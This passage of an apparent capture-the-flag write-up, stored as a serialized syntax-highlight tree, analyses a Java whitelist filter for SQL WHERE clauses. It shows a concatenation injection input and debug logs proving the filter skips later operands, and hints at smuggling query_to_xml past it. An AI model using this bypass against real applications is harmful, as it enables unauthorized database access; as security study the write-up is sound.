whiteTable = SQLCheck.getWhiteTable();\n\n if (!whiteTable.contains(tablename)) {\n return false;\n }\n BinaryExpression expression = (BinaryExpression)plainSelect.getWhere();\n\n if (!restrictExpr(expression)) {\n return false;\n }\n return true;\n }\n }\n return false;\n}\n",[26354],{"type":33,"tag":105,"props":26355,"children":26356},{"__ignoreMap":8},[26357,26394,26428,26461,26500,26534,26567,26616,26663,26670,26716,26732,26739,26787,26794,26830,26845,26852,26867,26874,26881,26896],{"type":33,"tag":128,"props":26358,"children":26359},{"class":130,"line":131},[26360,26365,26369,26373,26377,26381,26386,26390],{"type":33,"tag":128,"props":26361,"children":26362},{"style":300},[26363],{"type":38,"value":26364},"private",{"type":33,"tag":128,"props":26366,"children":26367},{"style":300},[26368],{"type":38,"value":25958},{"type":33,"tag":128,"props":26370,"children":26371},{"style":300},[26372],{"type":38,"value":25963},{"type":33,"tag":128,"props":26374,"children":26375},{"style":135},[26376],{"type":38,"value":26127},{"type":33,"tag":128,"props":26378,"children":26379},{"style":312},[26380],{"type":38,"value":5566},{"type":33,"tag":128,"props":26382,"children":26383},{"style":323},[26384],{"type":38,"value":26385},"Select statement",{"type":33,"tag":128,"props":26387,"children":26388},{"style":312},[26389],{"type":38,"value":2966},{"type":33,"tag":128,"props":26391,"children":26392},{"style":312},[26393],{"type":38,"value":762},{"type":33,"tag":128,"props":26395,"children":26396},{"class":130,"line":362},[26397,26402,26407,26411,26415,26419,26424],{"type":33,"tag":128,"props":26398,"children":26399},{"style":323},[26400],{"type":38,"value":26401}," SelectBody",{"type":33,"tag":128,"props":26403,"children":26404},{"style":306},[26405],{"type":38,"value":26406}," selectBody",{"type":33,"tag":128,"props":26408,"children":26409},{"style":312},[26410],{"type":38,"value":5657},{"type":33,"tag":128,"props":26412,"children":26413},{"style":306},[26414],{"type":38,"value":26039},{"type":33,"tag":128,"props":26416,"children":26417},{"style":312},[26418],{"type":38,"value":215},{"type":33,"tag":128,"props":26420,"children":26421},{"style":135},[26422],{"type":38,"value":26423},"getSelectBody",{"type":33,"tag":128,"props":26425,"children":26426},{"style":312},[26427],{"type":38,"value":15496},{"type":33,"tag":128,"props":26429,"children":26430},{"class":130,"line":403},[26431,26435,26439,26444,26448,26453,26457],{"type":33,"tag":128,"props":26432,"children":26433},{"style":1576},[26434],{"type":38,"value":16415},{"type":33,"tag":128,"props":26436,"children":26437},{"style":312},[26438],{"type":38,"value":2852},{"type":33,"tag":128,"props":26440,"children":26441},{"style":323},[26442],{"type":38,"value":26443},"selectBody ",{"type":33,"tag":128,"props":26445,"children":26446},{"style":300},[26447],{"type":38,"value":26102},{"type":33,"tag":128,"props":26449,"children":26450},{"style":323},[26451],{"type":38,"value":26452}," PlainSelect",{"type":33,"tag":128,"props":26454,"children":26455},{"style":312},[26456],{"type":38,"value":2966},{"type":33,"tag":128,"props":26458,"children":26459},{"style":312},[26460],{"type":38,"value":762},{"type":33,"tag":128,"props":26462,"children":26463},{"class":130,"line":739},[26464,26469,26474,26478,26482,26487,26491,26496],{"type":33,"tag":128,"props":26465,"children":26466},{"style":323},[26467],{"type":38,"value":26468}," PlainSelect",{"type":33,"tag":128,"props":26470,"children":26471},{"style":306},[26472],{"type":38,"value":26473}," plainSelect",{"type":33,"tag":128,"props":26475,"children":26476},{"style":312},[26477],{"type":38,"value":5657},{"type":33,"tag":128,"props":26479,"children":26480},{"style":312},[26481],{"type":38,"value":2852},{"type":33,"tag":128,"props":26483,"children":26484},{"style":323},[26485],{"type":38,"value":26486},"PlainSelect",{"type":33,"tag":128,"props":26488,"children":26489},{"style":312},[26490],{"type":38,"value":2966},{"type":33,"tag":128,"props":26492,"children":26493},{"style":323},[26494],{"type":38,"value":26495},"selectBody",{"type":33,"tag":128,"props":26497,"children":26498},{"style":312},[26499],{"type":38,"value":5676},{"type":33,"tag":128,"props":26501,"children":26502},{"class":130,"line":765},[26503,26508,26513,26517,26521,26525,26530],{"type":33,"tag":128,"props":26504,"children":26505},{"style":323},[26506],{"type":38,"value":26507}," FromItem",{"type":33,"tag":128,"props":26509,"children":26510},{"style":306},[26511],{"type":38,"value":26512}," fromItem",{"type":33,"tag":128,"props":26514,"children":26515},{"style":312},[26516],{"type":38,"value":5657},{"type":33,"tag":128,"props":26518,"children":26519},{"style":306},[26520],{"type":38,"value":26473},{"type":33,"tag":128,"props":26522,"children":26523},{"style":312},[26524],{"type":38,"value":215},{"type":33,"tag":128,"props":26526,"children":26527},{"style":135},[26528],{"type":38,"value":26529},"getFromItem",{"type":33,"tag":128,"props":26531,"children":26532},{"style":312},[26533],{"type":38,"value":15496},{"type":33,"tag":128,"props":26535,"children":26536},{"class":130,"line":804},[26537,26541,26545,26550,26554,26559,26563],{"type":33,"tag":128,"props":26538,"children":26539},{"style":1576},[26540],{"type":38,"value":13561},{"type":33,"tag":128,"props":26542,"children":26543},{"style":312},[26544],{"type":38,"value":2852},{"type":33,"tag":128,"props":26546,"children":26547},{"style":323},[26548],{"type":38,"value":26549},"fromItem ",{"type":33,"tag":128,"props":26551,"children":26552},{"style":300},[26553],{"type":38,"value":26102},{"type":33,"tag":128,"props":26555,"children":26556},{"style":323},[26557],{"type":38,"value":26558}," Table",{"type":33,"tag":128,"props":26560,"children":26561},{"style":312},[26562],{"type":38,"value":2966},{"type":33,"tag":128,"props":26564,"children":26565},{"style":312},[26566],{"type":38,"value":762},{"type":33,"tag":128,"props":26568,"children":26569},{"class":130,"line":839},[26570,26575,26580,26584,26589,26594,26598,26603,26607,26612],{"type":33,"tag":128,"props":26571,"children":26572},{"style":323},[26573],{"type":38,"value":26574}," String",{"type":33,"tag":128,"props":26576,"children":26577},{"style":306},[26578],{"type":38,"value":26579}," tablename",{"type":33,"tag":128,"props":26581,"children":26582},{"style":312},[26583],{"type":38,"value":5657},{"type":33,"tag":128,"props":26585,"children":26586},{"style":312},[26587],{"type":38,"value":26588}," ((",{"type":33,"tag":128,"props":26590,"children":26591},{"style":323},[26592],{"type":38,"value":26593},"Table",{"type":33,"tag":128,"props":26595,"children":26596},{"style":312},[26597],{"type":38,"value":2966},{"type":33,"tag":128,"props":26599,"children":26600},{"style":323},[26601],{"type":38,"value":26602},"fromItem",{"type":33,"tag":128,"props":26604,"children":26605},{"style":312},[26606],{"type":38,"value":6700},{"type":33,"tag":128,"props":26608,"children":26609},{"style":135},[26610],{"type":38,"value":26611},"getName",{"type":33,"tag":128,"props":26613,"children":26614},{"style":312},[26615],{"type":38,"value":15496},{"type":33,"tag":128,"props":26617,"children":26618},{"class":130,"line":848},[26619,26624,26628,26632,26636,26641,26645,26650,26654,26659],{"type":33,"tag":128,"props":26620,"children":26621},{"style":323},[26622],{"type":38,"value":26623}," List",{"type":33,"tag":128,"props":26625,"children":26626},{"style":312},[26627],{"type":38,"value":5977},{"type":33,"tag":128,"props":26629,"children":26630},{"style":300},[26631],{"type":38,"value":25569},{"type":33,"tag":128,"props":26633,"children":26634},{"style":312},[26635],{"type":38,"value":6054},{"type":33,"tag":128,"props":26637,"children":26638},{"style":306},[26639],{"type":38,"value":26640}," whiteTable",{"type":33,"tag":128,"props":26642,"children":26643},{"style":312},[26644],{"type":38,"value":5657},{"type":33,"tag":128,"props":26646,"children":26647},{"style":306},[26648],{"type":38,"value":26649}," SQLCheck",{"type":33,"tag":128,"props":26651,"children":26652},{"style":312},[26653],{"type":38,"value":215},{"type":33,"tag":128,"props":26655,"children":26656},{"style":135},[26657],{"type":38,"value":26658},"getWhiteTable",{"type":33,"tag":128,"props":26660,"children":26661},{"style":312},[26662],{"type":38,"value":15496},{"type":33,"tag":128,"props":26664,"children":26665},{"class":130,"line":976},[26666],{"type":33,"tag":128,"props":26667,"children":26668},{"emptyLinePlaceholder":896},[26669],{"type":38,"value":899},{"type":33,"tag":128,"props":26671,"children":26672},{"class":130,"line":988},[26673,26677,26681,26685,26690,26694,26699,26703,26708,26712],{"type":33,"tag":128,"props":26674,"children":26675},{"style":1576},[26676],{"type":38,"value":15223},{"type":33,"tag":128,"props":26678,"children":26679},{"style":312},[26680],{"type":38,"value":2852},{"type":33,"tag":128,"props":26682,"children":26683},{"style":300},[26684],{"type":38,"value":16424},{"type":33,"tag":128,"props":26686,"children":26687},{"style":306},[26688],{"type":38,"value":26689},"whiteTable",{"type":33,"tag":128,"props":26691,"children":26692},{"style":312},[26693],{"type":38,"value":215},{"type":33,"tag":128,"props":26695,"children":26696},{"style":135},[26697],{"type":38,"value":26698},"contains",{"type":33,"tag":128,"props":26700,"children":26701},{"style":312},[26702],{"type":38,"value":5566},{"type":33,"tag":128,"props":26704,"children":26705},{"style":323},[26706],{"type":38,"value":26707},"tablename",{"type":33,"tag":128,"props":26709,"children":26710},{"style":312},[26711],{"type":38,"value":7088},{"type":33,"tag":128,"props":26713,"children":26714},{"style":312},[26715],{"type":38,"value":762},{"type":33,"tag":128,"props":26717,"children":26718},{"class":130,"line":1001},[26719,26724,26728],{"type":33,"tag":128,"props":26720,"children":26721},{"style":1576},[26722],{"type":38,"value":26723}," return",{"type":33,"tag":128,"props":26725,"children":26726},{"style":1576},[26727],{"type":38,"value":6721},{"type":33,"tag":128,"props":26729,"children":26730},{"style":312},[26731],{"type":38,"value":5676},{"type":33,"tag":128,"props":26733,"children":26734},{"class":130,"line":1014},[26735],{"type":33,"tag":128,"props":26736,"children":26737},{"style":312},[26738],{"type":38,"value":15318},{"type":33,"tag":128,"props":26740,"children":26741},{"class":130,"line":1026},[26742,26747,26752,26756,26760,26765,26769,26774,26778,26783],{"type":33,"tag":128,"props":26743,"children":26744},{"style":323},[26745],{"type":38,"value":26746}," BinaryExpression",{"type":33,"tag":128,"props":26748,"children":26749},{"style":306},[26750],{"type":38,"value":26751}," expression",{"type":33,"tag":128,"props":26753,"children":26754},{"style":312},[26755],{"type":38,"value":5657},{"type":33,"tag":128,"props":26757,"children":26758},{"style":312},[26759],{"type":38,"value":2852},{"type":33,"tag":128,"props":26761,"children":26762},{"style":323},[26763],{"type":38,"value":26764},"BinaryExpression",{"type":33,"tag":128,"props":26766,"children":26767},{"style":312},[26768],{"type":38,"value":2966},{"type":33,"tag":128,"props":26770,"children":26771},{"style":306},[26772],{"type":38,"value":26773},"plainSelect",{"type":33,"tag":128,"props":26775,"children":26776},{"style":312},[26777],{"type":38,"value":215},{"type":33,"tag":128,"props":26779,"children":26780},{"style":135},[26781],{"type":38,"value":26782},"getWhere",{"type":33,"tag":128,"props":26784,"children":26785},{"style":312},[26786],{"type":38,"value":15496},{"type":33,"tag":128,"props":26788,"children":26789},{"class":130,"line":1038},[26790],{"type":33,"tag":128,"props":26791,"children":26792},{"emptyLinePlaceholder":896},[26793],{"type":38,"value":899},{"type":33,"tag":128,"props":26795,"children":26796},{"class":130,"line":1051},[26797,26801,26805,26809,26814,26818,26822,26826],{"type":33,"tag":128,"props":26798,"children":26799},{"style":1576},[26800],{"type":38,"value":15223},{"type":33,"tag":128,"props":26802,"children":26803},{"style":312},[26804],{"type":38,"value":2852},{"type":33,"tag":128,"props":26806,"children":26807},{"style":300},[26808],{"type":38,"value":16424},{"type":33,"tag":128,"props":26810,"children":26811},{"style":135},[26812],{"type":38,"value":26813},"restrictExpr",{"type":33,"tag":128,"props":26815,"children":26816},{"style":312},[26817],{"type":38,"value":5566},{"type":33,"tag":128,"props":26819,"children":26820},{"style":323},[26821],{"type":38,"value":814},{"type":33,"tag":128,"props":26823,"children":26824},{"style":312},[26825],{"type":38,"value":7088},{"type":33,"tag":128,"props":26827,"children":26828},{"style":312},[26829],{"type":38,"value":762},{"type":33,"tag":128,"props":26831,"children":26832},{"class":130,"line":1063},[26833,26837,26841],{"type":33,"tag":128,"props":26834,"children":26835},{"style":1576},[26836],{"type":38,"value":26723},{"type":33,"tag":128,"props":26838,"children":26839},{"style":1576},[26840],{"type":38,"value":6721},{"type":33,"tag":128,"props":26842,"children":26843},{"style":312},[26844],{"type":38,"value":5676},{"type":33,"tag":128,"props":26846,"children":26847},{"class":130,"line":1076},[26848],{"type":33,"tag":128,"props":26849,"children":26850},{"style":312},[26851],{"type":38,"value":15318},{"type":33,"tag":128,"props":26853,"children":26854},{"class":130,"line":1089},[26855,26859,26863],{"type":33,"tag":128,"props":26856,"children":26857},{"style":1576},[26858],{"type":38,"value":13615},{"type":33,"tag":128,"props":26860,"children":26861},{"style":1576},[26862],{"type":38,"value":5850},{"type":33,"tag":128,"props":26864,"children":26865},{"style":312},[26866],{"type":38,"value":5676},{"type":33,"tag":128,"props":26868,"children":26869},{"class":130,"line":1101},[26870],{"type":33,"tag":128,"props":26871,"children":26872},{"style":312},[26873],{"type":38,"value":13656},{"type":33,"tag":128,"props":26875,"children":26876},{"class":130,"line":1114},[26877],{"type":33,"tag":128,"props":26878,"children":26879},{"style":312},[26880],{"type":38,"value":845},{"type":33,"tag":128,"props":26882,"children":26883},{"class":130,"line":1127},[26884,26888,26892],{"type":33,"tag":128,"props":26885,"children":26886},{"style":1576},[26887],{"type":38,"value":13056},{"type":33,"tag":128,"props":26889,"children":26890},{"style":1576},[26891],{"type":38,"value":6721},{"type":33,"tag":128,"props":26893,"children":26894},{"style":312},[26895],{"type":38,"value":5676},{"type":33,"tag":128,"props":26897,"children":26898},{"class":130,"line":1139},[26899],{"type":33,"tag":128,"props":26900,"children":26901},{"style":312},[26902],{"type":38,"value":854},{"type":33,"tag":47,"props":26904,"children":26905},{},[26906,26908,26913,26915,26921,26923,26928],{"type":38,"value":26907},"Next, the function will check the last part, namely, the where part of the query. For this, it will retrieve the entirety of the where with the ",{"type":33,"tag":105,"props":26909,"children":26911},{"className":26910},[],[26912],{"type":38,"value":26782},{"type":38,"value":26914}," function from the library ",{"type":33,"tag":105,"props":26916,"children":26918},{"className":26917},[],[26919],{"type":38,"value":26920},"net.sf.jsqlparser.expression",{"type":38,"value":26922}," and call the function ",{"type":33,"tag":105,"props":26924,"children":26926},{"className":26925},[],[26927],{"type":38,"value":26813},{"type":38,"value":215},{"type":33,"tag":47,"props":26930,"children":26931},{},[26932],{"type":38,"value":26933},"The firsts three checks are not of interest to us because they are okay in our case given that we have not altered these parts of the query.",{"type":33,"tag":47,"props":26935,"children":26936},{},[26937,26939,26944],{"type":38,"value":26938},"Here since we injected into the where, it is the filter on this one that must be bypassed. If we look closely at the ",{"type":33,"tag":105,"props":26940,"children":26942},{"className":26941},[],[26943],{"type":38,"value":26813},{"type":38,"value":26945}," function. We can see that this recursive function retrieves the right part and the left part of the where part of the query.",{"type":33,"tag":114,"props":26947,"children":26948},{"lang":25552},[26949],{"type":33,"tag":119,"props":26950,"children":26952},{"code":26951,"language":25552,"meta":8,"className":25557,"style":8},"private static boolean restrictExpr(BinaryExpression expression) {\n Expression left_expr = expression.getLeftExpression();\n Expression right_expr = expression.getRightExpression();\n if (left_expr instanceof BinaryExpression) {\n return restrictExpr((BinaryExpression)left_expr);\n } else if (right_expr instanceof BinaryExpression) {\n return restrictExpr((BinaryExpression)right_expr);\n } else {\n List arrays = Arrays.asList(restrictExprCls); \n return arrays.contains(left_expr.getClass()) && arrays.contains(right_expr.getClass());\n }\n}\n",[26953],{"type":33,"tag":105,"props":26954,"children":26955},{"__ignoreMap":8},[26956,26993,27027,27060,27093,27125,27165,27197,27212,27262,27340,27347],{"type":33,"tag":128,"props":26957,"children":26958},{"class":130,"line":131},[26959,26963,26967,26971,26976,26980,26985,26989],{"type":33,"tag":128,"props":26960,"children":26961},{"style":300},[26962],{"type":38,"value":26364},{"type":33,"tag":128,"props":26964,"children":26965},{"style":300},[26966],{"type":38,"value":25958},{"type":33,"tag":128,"props":26968,"children":26969},{"style":300},[26970],{"type":38,"value":25963},{"type":33,"tag":128,"props":26972,"children":26973},{"style":135},[26974],{"type":38,"value":26975}," restrictExpr",{"type":33,"tag":128,"props":26977,"children":26978},{"style":312},[26979],{"type":38,"value":5566},{"type":33,"tag":128,"props":26981,"children":26982},{"style":323},[26983],{"type":38,"value":26984},"BinaryExpression expression",{"type":33,"tag":128,"props":26986,"children":26987},{"style":312},[26988],{"type":38,"value":2966},{"type":33,"tag":128,"props":26990,"children":26991},{"style":312},[26992],{"type":38,"value":762},{"type":33,"tag":128,"props":26994,"children":26995},{"class":130,"line":362},[26996,27001,27006,27010,27014,27018,27023],{"type":33,"tag":128,"props":26997,"children":26998},{"style":323},[26999],{"type":38,"value":27000}," Expression",{"type":33,"tag":128,"props":27002,"children":27003},{"style":306},[27004],{"type":38,"value":27005}," left_expr",{"type":33,"tag":128,"props":27007,"children":27008},{"style":312},[27009],{"type":38,"value":5657},{"type":33,"tag":128,"props":27011,"children":27012},{"style":306},[27013],{"type":38,"value":26751},{"type":33,"tag":128,"props":27015,"children":27016},{"style":312},[27017],{"type":38,"value":215},{"type":33,"tag":128,"props":27019,"children":27020},{"style":135},[27021],{"type":38,"value":27022},"getLeftExpression",{"type":33,"tag":128,"props":27024,"children":27025},{"style":312},[27026],{"type":38,"value":15496},{"type":33,"tag":128,"props":27028,"children":27029},{"class":130,"line":403},[27030,27034,27039,27043,27047,27051,27056],{"type":33,"tag":128,"props":27031,"children":27032},{"style":323},[27033],{"type":38,"value":27000},{"type":33,"tag":128,"props":27035,"children":27036},{"style":306},[27037],{"type":38,"value":27038}," right_expr",{"type":33,"tag":128,"props":27040,"children":27041},{"style":312},[27042],{"type":38,"value":5657},{"type":33,"tag":128,"props":27044,"children":27045},{"style":306},[27046],{"type":38,"value":26751},{"type":33,"tag":128,"props":27048,"children":27049},{"style":312},[27050],{"type":38,"value":215},{"type":33,"tag":128,"props":27052,"children":27053},{"style":135},[27054],{"type":38,"value":27055},"getRightExpression",{"type":33,"tag":128,"props":27057,"children":27058},{"style":312},[27059],{"type":38,"value":15496},{"type":33,"tag":128,"props":27061,"children":27062},{"class":130,"line":739},[27063,27067,27071,27076,27080,27085,27089],{"type":33,"tag":128,"props":27064,"children":27065},{"style":1576},[27066],{"type":38,"value":16415},{"type":33,"tag":128,"props":27068,"children":27069},{"style":312},[27070],{"type":38,"value":2852},{"type":33,"tag":128,"props":27072,"children":27073},{"style":323},[27074],{"type":38,"value":27075},"left_expr ",{"type":33,"tag":128,"props":27077,"children":27078},{"style":300},[27079],{"type":38,"value":26102},{"type":33,"tag":128,"props":27081,"children":27082},{"style":323},[27083],{"type":38,"value":27084}," BinaryExpression",{"type":33,"tag":128,"props":27086,"children":27087},{"style":312},[27088],{"type":38,"value":2966},{"type":33,"tag":128,"props":27090,"children":27091},{"style":312},[27092],{"type":38,"value":762},{"type":33,"tag":128,"props":27094,"children":27095},{"class":130,"line":765},[27096,27100,27104,27108,27112,27116,27121],{"type":33,"tag":128,"props":27097,"children":27098},{"style":1576},[27099],{"type":38,"value":6673},{"type":33,"tag":128,"props":27101,"children":27102},{"style":135},[27103],{"type":38,"value":26975},{"type":33,"tag":128,"props":27105,"children":27106},{"style":312},[27107],{"type":38,"value":13071},{"type":33,"tag":128,"props":27109,"children":27110},{"style":323},[27111],{"type":38,"value":26764},{"type":33,"tag":128,"props":27113,"children":27114},{"style":312},[27115],{"type":38,"value":2966},{"type":33,"tag":128,"props":27117,"children":27118},{"style":323},[27119],{"type":38,"value":27120},"left_expr",{"type":33,"tag":128,"props":27122,"children":27123},{"style":312},[27124],{"type":38,"value":5815},{"type":33,"tag":128,"props":27126,"children":27127},{"class":130,"line":804},[27128,27132,27136,27140,27144,27149,27153,27157,27161],{"type":33,"tag":128,"props":27129,"children":27130},{"style":312},[27131],{"type":38,"value":6850},{"type":33,"tag":128,"props":27133,"children":27134},{"style":1576},[27135],{"type":38,"value":14269},{"type":33,"tag":128,"props":27137,"children":27138},{"style":1576},[27139],{"type":38,"value":14274},{"type":33,"tag":128,"props":27141,"children":27142},{"style":312},[27143],{"type":38,"value":2852},{"type":33,"tag":128,"props":27145,"children":27146},{"style":323},[27147],{"type":38,"value":27148},"right_expr ",{"type":33,"tag":128,"props":27150,"children":27151},{"style":300},[27152],{"type":38,"value":26102},{"type":33,"tag":128,"props":27154,"children":27155},{"style":323},[27156],{"type":38,"value":27084},{"type":33,"tag":128,"props":27158,"children":27159},{"style":312},[27160],{"type":38,"value":2966},{"type":33,"tag":128,"props":27162,"children":27163},{"style":312},[27164],{"type":38,"value":762},{"type":33,"tag":128,"props":27166,"children":27167},{"class":130,"line":839},[27168,27172,27176,27180,27184,27188,27193],{"type":33,"tag":128,"props":27169,"children":27170},{"style":1576},[27171],{"type":38,"value":6673},{"type":33,"tag":128,"props":27173,"children":27174},{"style":135},[27175],{"type":38,"value":26975},{"type":33,"tag":128,"props":27177,"children":27178},{"style":312},[27179],{"type":38,"value":13071},{"type":33,"tag":128,"props":27181,"children":27182},{"style":323},[27183],{"type":38,"value":26764},{"type":33,"tag":128,"props":27185,"children":27186},{"style":312},[27187],{"type":38,"value":2966},{"type":33,"tag":128,"props":27189,"children":27190},{"style":323},[27191],{"type":38,"value":27192},"right_expr",{"type":33,"tag":128,"props":27194,"children":27195},{"style":312},[27196],{"type":38,"value":5815},{"type":33,"tag":128,"props":27198,"children":27199},{"class":130,"line":848},[27200,27204,27208],{"type":33,"tag":128,"props":27201,"children":27202},{"style":312},[27203],{"type":38,"value":6850},{"type":33,"tag":128,"props":27205,"children":27206},{"style":1576},[27207],{"type":38,"value":14269},{"type":33,"tag":128,"props":27209,"children":27210},{"style":312},[27211],{"type":38,"value":762},{"type":33,"tag":128,"props":27213,"children":27214},{"class":130,"line":976},[27215,27220,27225,27229,27234,27238,27243,27247,27252,27257],{"type":33,"tag":128,"props":27216,"children":27217},{"style":323},[27218],{"type":38,"value":27219}," List",{"type":33,"tag":128,"props":27221,"children":27222},{"style":306},[27223],{"type":38,"value":27224}," arrays",{"type":33,"tag":128,"props":27226,"children":27227},{"style":312},[27228],{"type":38,"value":5657},{"type":33,"tag":128,"props":27230,"children":27231},{"style":306},[27232],{"type":38,"value":27233}," Arrays",{"type":33,"tag":128,"props":27235,"children":27236},{"style":312},[27237],{"type":38,"value":215},{"type":33,"tag":128,"props":27239,"children":27240},{"style":135},[27241],{"type":38,"value":27242},"asList",{"type":33,"tag":128,"props":27244,"children":27245},{"style":312},[27246],{"type":38,"value":5566},{"type":33,"tag":128,"props":27248,"children":27249},{"style":323},[27250],{"type":38,"value":27251},"restrictExprCls",{"type":33,"tag":128,"props":27253,"children":27254},{"style":312},[27255],{"type":38,"value":27256},");",{"type":33,"tag":128,"props":27258,"children":27259},{"style":323},[27260],{"type":38,"value":27261}," \n",{"type":33,"tag":128,"props":27263,"children":27264},{"class":130,"line":988},[27265,27269,27273,27277,27281,27285,27289,27293,27298,27303,27307,27311,27315,27319,27323,27327,27331,27335],{"type":33,"tag":128,"props":27266,"children":27267},{"style":1576},[27268],{"type":38,"value":6673},{"type":33,"tag":128,"props":27270,"children":27271},{"style":306},[27272],{"type":38,"value":27224},{"type":33,"tag":128,"props":27274,"children":27275},{"style":312},[27276],{"type":38,"value":215},{"type":33,"tag":128,"props":27278,"children":27279},{"style":135},[27280],{"type":38,"value":26698},{"type":33,"tag":128,"props":27282,"children":27283},{"style":312},[27284],{"type":38,"value":5566},{"type":33,"tag":128,"props":27286,"children":27287},{"style":306},[27288],{"type":38,"value":27120},{"type":33,"tag":128,"props":27290,"children":27291},{"style":312},[27292],{"type":38,"value":215},{"type":33,"tag":128,"props":27294,"children":27295},{"style":135},[27296],{"type":38,"value":27297},"getClass",{"type":33,"tag":128,"props":27299,"children":27300},{"style":312},[27301],{"type":38,"value":27302},"())",{"type":33,"tag":128,"props":27304,"children":27305},{"style":300},[27306],{"type":38,"value":10037},{"type":33,"tag":128,"props":27308,"children":27309},{"style":306},[27310],{"type":38,"value":27224},{"type":33,"tag":128,"props":27312,"children":27313},{"style":312},[27314],{"type":38,"value":215},{"type":33,"tag":128,"props":27316,"children":27317},{"style":135},[27318],{"type":38,"value":26698},{"type":33,"tag":128,"props":27320,"children":27321},{"style":312},[27322],{"type":38,"value":5566},{"type":33,"tag":128,"props":27324,"children":27325},{"style":306},[27326],{"type":38,"value":27192},{"type":33,"tag":128,"props":27328,"children":27329},{"style":312},[27330],{"type":38,"value":215},{"type":33,"tag":128,"props":27332,"children":27333},{"style":135},[27334],{"type":38,"value":27297},{"type":33,"tag":128,"props":27336,"children":27337},{"style":312},[27338],{"type":38,"value":27339},"());\n",{"type":33,"tag":128,"props":27341,"children":27342},{"class":130,"line":1001},[27343],{"type":33,"tag":128,"props":27344,"children":27345},{"style":312},[27346],{"type":38,"value":845},{"type":33,"tag":128,"props":27348,"children":27349},{"class":130,"line":1014},[27350],{"type":33,"tag":128,"props":27351,"children":27352},{"style":312},[27353],{"type":38,"value":854},{"type":33,"tag":47,"props":27355,"children":27356},{},[27357],{"type":38,"value":27358},"If one of the parts contains another part of where then the function will be reapplied. At the end of the recursion, if one of the two parts does not respect the whitelisted types then the query is not accepted.",{"type":33,"tag":47,"props":27360,"children":27361},{},[27362],{"type":38,"value":27363},"The whitelisted types are:",{"type":33,"tag":114,"props":27365,"children":27366},{"lang":25649},[27367],{"type":33,"tag":119,"props":27368,"children":27371},{"code":27369,"language":25649,"meta":8,"className":27370,"style":8},"LongValue\nStringValue\nNullValue\nTimeValue\nTimestampValue\nDateValue\nDoubleValue\nColumn\n","language-txt shiki shiki-themes vitesse-dark",[27372],{"type":33,"tag":105,"props":27373,"children":27374},{"__ignoreMap":8},[27375,27383,27391,27399,27407,27415,27423,27431],{"type":33,"tag":128,"props":27376,"children":27377},{"class":130,"line":131},[27378],{"type":33,"tag":128,"props":27379,"children":27380},{},[27381],{"type":38,"value":27382},"LongValue\n",{"type":33,"tag":128,"props":27384,"children":27385},{"class":130,"line":362},[27386],{"type":33,"tag":128,"props":27387,"children":27388},{},[27389],{"type":38,"value":27390},"StringValue\n",{"type":33,"tag":128,"props":27392,"children":27393},{"class":130,"line":403},[27394],{"type":33,"tag":128,"props":27395,"children":27396},{},[27397],{"type":38,"value":27398},"NullValue\n",{"type":33,"tag":128,"props":27400,"children":27401},{"class":130,"line":739},[27402],{"type":33,"tag":128,"props":27403,"children":27404},{},[27405],{"type":38,"value":27406},"TimeValue\n",{"type":33,"tag":128,"props":27408,"children":27409},{"class":130,"line":765},[27410],{"type":33,"tag":128,"props":27411,"children":27412},{},[27413],{"type":38,"value":27414},"TimestampValue\n",{"type":33,"tag":128,"props":27416,"children":27417},{"class":130,"line":804},[27418],{"type":33,"tag":128,"props":27419,"children":27420},{},[27421],{"type":38,"value":27422},"DateValue\n",{"type":33,"tag":128,"props":27424,"children":27425},{"class":130,"line":839},[27426],{"type":33,"tag":128,"props":27427,"children":27428},{},[27429],{"type":38,"value":27430},"DoubleValue\n",{"type":33,"tag":128,"props":27432,"children":27433},{"class":130,"line":848},[27434],{"type":33,"tag":128,"props":27435,"children":27436},{},[27437],{"type":38,"value":27438},"Column\n",{"type":33,"tag":47,"props":27440,"children":27441},{},[27442,27444,27450,27452,27458],{"type":38,"value":27443},"Spoiler, the function ",{"type":33,"tag":105,"props":27445,"children":27447},{"className":27446},[],[27448],{"type":38,"value":27449},"query_to_xml",{"type":38,"value":27451}," returns a ",{"type":33,"tag":105,"props":27453,"children":27455},{"className":27454},[],[27456],{"type":38,"value":27457},"Function",{"type":38,"value":27459}," type. So we need to trick the filter to make it believe that the object returned by allowed types.",{"type":33,"tag":47,"props":27461,"children":27462},{},[27463,27465,27471,27472,27478,27480,27485],{"type":38,"value":27464},"The left and right part is determined by the ",{"type":33,"tag":105,"props":27466,"children":27468},{"className":27467},[],[27469],{"type":38,"value":27470},"getLeft",{"type":38,"value":6345},{"type":33,"tag":105,"props":27473,"children":27475},{"className":27474},[],[27476],{"type":38,"value":27477},"getRight",{"type":38,"value":27479}," function of the library ",{"type":33,"tag":105,"props":27481,"children":27483},{"className":27482},[],[27484],{"type":38,"value":26920},{"type":38,"value":215},{"type":33,"tag":47,"props":27487,"children":27488},{},[27489],{"type":38,"value":27490},"For example if we submit the following query:",{"type":33,"tag":114,"props":27492,"children":27493},{"lang":25649},[27494],{"type":33,"tag":119,"props":27495,"children":27497},{"code":27496},"username=a'||'b'||'c'||'d&passwd=a\n",[27498],{"type":33,"tag":105,"props":27499,"children":27500},{"__ignoreMap":8},[27501],{"type":38,"value":27496},{"type":33,"tag":47,"props":27503,"children":27504},{},[27505,27507,27512,27514,27520],{"type":38,"value":27506},"If we add a bit of debugging, we can see that at the end of the recursion, the left part will be ",{"type":33,"tag":105,"props":27508,"children":27510},{"className":27509},[],[27511],{"type":38,"value":53},{"type":38,"value":27513}," and the right part will be ",{"type":33,"tag":105,"props":27515,"children":27517},{"className":27516},[],[27518],{"type":38,"value":27519},"b",{"type":38,"value":27521},". It means that c and d are not processed by the check function.",{"type":33,"tag":114,"props":27523,"children":27524},{"lang":25649},[27525],{"type":33,"tag":119,"props":27526,"children":27528},{"code":27527,"language":25649,"meta":8,"className":27370,"style":8},"app-1 | [SQLParser.restrictExpr] left_expr.getClass(): class net.sf.jsqlparser.expression.StringValue\napp-1 | [SQLParser.restrictExpr] left_expr: 'A'\napp-1 | [SQLParser.restrictExpr] right_expr.getClass(): class net.sf.jsqlparser.expression.StringValue\napp-1 | [SQLParser.restrictExpr] right_expr: 'B'\napp-1 | [SQLParser.processSelect] expression: USERNAME = 'A' || 'B' || 'C' || 'D'\n",[27529],{"type":33,"tag":105,"props":27530,"children":27531},{"__ignoreMap":8},[27532,27540,27548,27556,27564],{"type":33,"tag":128,"props":27533,"children":27534},{"class":130,"line":131},[27535],{"type":33,"tag":128,"props":27536,"children":27537},{},[27538],{"type":38,"value":27539},"app-1 | [SQLParser.restrictExpr] left_expr.getClass(): class 